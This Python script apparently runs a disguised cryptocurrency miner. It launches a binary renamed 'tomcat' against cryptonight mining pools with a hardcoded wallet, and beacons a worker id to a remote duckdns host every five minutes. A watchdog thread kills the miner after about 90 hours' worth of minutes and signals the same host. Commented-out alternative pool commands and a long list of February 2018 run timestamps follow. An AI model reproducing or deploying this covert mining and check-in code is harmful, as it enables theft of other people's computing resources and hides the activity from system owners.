import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:06.187624
#2018-02-17 17:36:07.263283
#2018-02-17 19:24:06.565409
#2018-02-17 21:13:01.973878
#2018-02-17 22:57:06.829252
#2018-02-18 00:42:03.470977
#2018-02-18 02:31:05.629129
#2018-02-18 04:18:05.371650
#2018-02-18 06:09:04.829746
#2018-02-18 07:58:01.990856
#2018-02-18 09:45:09.192822
#2018-02-18 11:29:06.688478
#2018-02-18 13:16:03.879629
#2018-02-18 15:06:04.439559
#2018-02-18 16:53:06.313786
#2018-02-18 18:42:07.749844
#2018-02-18 20:29:03.474814
#2018-02-18 22:15:03.954813
#2018-02-19 00:04:07.012320
#2018-02-19 01:49:06.316411
#2018-02-19 03:37:04.524071
#2018-02-19 05:21:07.580321
#2018-02-19 07:07:06.254171
#2018-02-19 08:56:01.653996
#2018-02-19 10:45:11.320876
#2018-02-19 12:34:07.038825
#2018-02-19 14:23:01.734452
#2018-02-19 16:12:04.515414
#2018-02-19 17:58:09.948212
#2018-02-19 19:45:04.310100
#2018-02-19 21:33:07.136559
#2018-02-19 23:18:08.840481
#2018-02-20 01:06:04.741927
#2018-02-20 02:54:05.442558
#2018-02-20 04:42:02.208550
#2018-02-20 06:26:04.926314
#2018-02-20 08:10:08.736970
#2018-02-20 09:57:04.852575
#2018-02-20 11:40:11.139688
#2018-02-20 13:27:09.370348
#2018-02-20 15:13:01.284904
#2018-02-20 16:57:04.088199
#2018-02-20 18:46:10.438752
#2018-02-20 20:39:01.368036
#2018-02-20 22:23:05.984418
#2018-02-21 00:05:05.407922
#2018-02-21 01:51:01.317241
#2018-02-21 03:41:05.955228
#2018-02-21 05:29:03.925088
#2018-02-21 07:17:07.415933
#2018-02-21 09:03:04.447145
#2018-02-21 10:51:03.626533
#2018-02-21 12:39:04.431952
#2018-02-21 14:27:04.611512
#2018-02-21 16:13:07.018980
#2018-02-21 18:02:09.362358
#2018-02-21 19:48:01.563144
#2018-02-21 21:36:07.836162
#2018-02-21 23:24:05.384683
#2018-02-22 01:12:07.040619
#2018-02-22 02:59:04.560116
#2018-02-22 04:45:09.783478
#2018-02-22 06:30:08.737057
#2018-02-22 08:17:05.831485
#2018-02-22 10:06:08.211654
#2018-02-22 11:51:12.387539
#2018-02-22 13:35:07.689162
#2018-02-22 15:23:08.767962
#2018-02-22 17:08:07.139700
#2018-02-22 18:54:07.538715
#2018-02-22 20:47:01.680229
#2018-02-22 22:33:01.340583
#2018-02-23 00:18:06.462712
#2018-02-23 02:07:09.106008
#2018-02-23 03:52:01.933920
#2018-02-23 05:34:06.813468
#2018-02-23 07:20:08.450960
#2018-02-23 09:24:08.546163
#2018-02-23 11:29:08.097268
#2018-02-23 13:18:08.404976
#2018-02-23 15:05:04.675324
#2018-02-23 16:55:08.168984
#2018-02-23 18:44:05.032475
#2018-02-23 20:32:06.946992
#2018-02-23 22:19:07.597228
#2018-02-24 00:06:05.776053
#2018-02-24 01:57:05.482086
#2018-02-24 03:49:02.251398
#2018-02-24 05:31:05.655633
#2018-02-24 07:17:03.582709
#2018-02-24 09:07:03.475470
#2018-02-24 10:45:07.346552
#2018-02-24 12:31:05.438072
#2018-02-24 14:09:07.008314
#2018-02-24 15:43:04.887990
#2018-02-24 17:22:06.594156
#2018-02-24 18:54:05.168275
#2018-02-24 20:25:08.033285
#2018-02-24 21:57:03.686710
#2018-02-25 00:44:03.454455
#2018-02-25 02:44:04.844323
#2018-02-25 06:33:05.717485